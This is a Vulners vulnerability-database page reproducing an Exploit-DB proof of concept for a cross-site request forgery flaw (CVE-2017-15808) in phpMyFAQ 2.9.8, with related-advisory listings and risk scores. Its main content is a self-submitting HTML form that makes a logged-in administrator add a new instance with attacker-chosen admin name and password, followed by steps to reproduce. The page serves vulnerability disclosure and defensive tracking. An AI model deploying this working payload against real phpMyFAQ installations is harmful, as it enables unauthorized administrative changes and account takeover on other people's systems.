Lucene search
K

phpMyFaq 2.9.8 - Cross Site Request Forgery (CSRF)

๐Ÿ—“๏ธย 03 Dec 2025ย 00:00:00Reported byย CodeSecLabTypeย 
exploitdb
ย exploitdb
๐Ÿ”—ย www.exploit-db.com๐Ÿ‘ย 132ย Views

Cross site request forgery in phpMyFAQ 2.9.8 enables unauthorized admin actions (CVE-2017-15808).

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2017-15808
16 Apr 202514:56
โ€“circl
CNVD
Cross-site request forgery vulnerability in phpMyFaq admin/ajax.config.php file
24 Oct 201700:00
โ€“cnvd
CVE
CVE-2017-15808
23 Oct 201717:00
โ€“cve
Cvelist
CVE-2017-15808
23 Oct 201717:00
โ€“cvelist
EUVD
EUVD-2017-7230
7 Oct 202500:30
โ€“euvd
NVD
CVE-2017-15808
23 Oct 201717:29
โ€“nvd
OpenVAS
phpMyFAQ < 2.9.9 Multiple XSS And CSRF Vulnerabilities
21 Sep 201700:00
โ€“openvas
OSV
CVE-2017-15808
23 Oct 201717:29
โ€“osv
Packet Storm
๐Ÿ“„ phpMyFAQ 2.9.8 Cross Site Request Forgery
4 Dec 202500:00
โ€“packetstorm
Prion
Cross site request forgery (csrf)
23 Oct 201717:29
โ€“prion
Rows per page
# Exploit Title: phpMyFaq 2.9.8 - Cross Site Request Forgery (CSRF)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ/
# Software Link: https://github.com/thorsten/phpMyFAQ/
# Version: 2.9.8
# Tested on: Windows 10
# CVE : CVE-2017-15808


PoC: 
<html>
  <body>
    <form action="http://phpmyfaq/admin/index.php" method="GET">
      <input type="hidden" name="action" value="ajax">
      <input type="hidden" name="ajax" value="config">
      <input type="hidden" name="ajaxaction" value="add_instance">
      <input type="hidden" name="url" value="malicious">
      <input type="hidden" name="instance" value="malicious_instance">
      <input type="hidden" name="comment" value="CSRF Test">
      <input type="hidden" name="email" value="[email protected]">
      <input type="hidden" name="admin" value="attacker">
      <input type="hidden" name="password" value="password123">
      <input type="submit" value="Submit request">
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Steps to Reproduce:
1. Save the following code as poc.html.
2. Log in phpmyfaq, and open the file in the same browser.
3. The outcome will occur.

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Dec 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 26.8
CVSS 38.8
EPSS0.00344
132